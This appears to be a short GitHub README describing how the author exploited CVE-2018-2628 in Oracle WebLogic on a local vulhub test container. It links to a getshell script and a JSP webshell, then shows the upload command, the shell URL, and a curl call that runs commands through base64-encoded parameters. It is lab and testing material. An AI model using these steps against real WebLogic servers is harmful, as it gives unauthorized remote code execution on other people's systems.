# WebLogic - CVE-2018-2628 Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. ## PoC This vulnerability can be exploited using [jas502n](https://github.com/jas502n/CVE-2018-2628)'s script [`CVE-2018-2628-Getshell.py`](https://github.com/0xPThree/WebLogic/blob/main/cve-2018-2628/CVE-2018-2628-Getshell.py). A working webshell (to be uploaded) can be found on my [git](https://github.com/0xPThree/WebLogic/blob/main/cve-2018-2628/shell1.jsp), it is massive and looks weird, but as you see in the picture it will be compiled to a smaller shell. This is probably an error on my end, but I'm too lazy to investigate at the moment. **Note** that the shell is **one-time-use** only, meaning it will be removed once you execute a command.

## Tested on VulnHubs weblogic:10.3.6.0-2017 container
» docker container ls
CONTAINER ID   IMAGE                                                        COMMAND                  CREATED       STATUS                 PORTS                                                                                            NAMES
f3b474a990a1   vulhub/weblogic:10.3.6.0-2017                                "startWebLogic.sh"       5 hours ago   Up 5 hours             5556/tcp, 0.0.0.0:7003->7001/tcp, :::7003->7001/tcp, 0.0.0.0:9004->9002/tcp, :::9004->9002/tcp   vuln-weblogic

```sh ## Upload shell » python2.7 CVE-2018-2628-Getshell.py 127.0.0.1 7003 shell1.jsp >>>Shell File Upload Dir: servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell1.jsp >>>Getshell: http://127.0.0.1:7003/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg== ## Execute command ('hostname' in this case) » curl http://127.0.0.1:7003/bea_wls_internal/shell1.jsp\?tom\=aG9zdG5hbWU\= ->|vuln-weblogic |<-% ```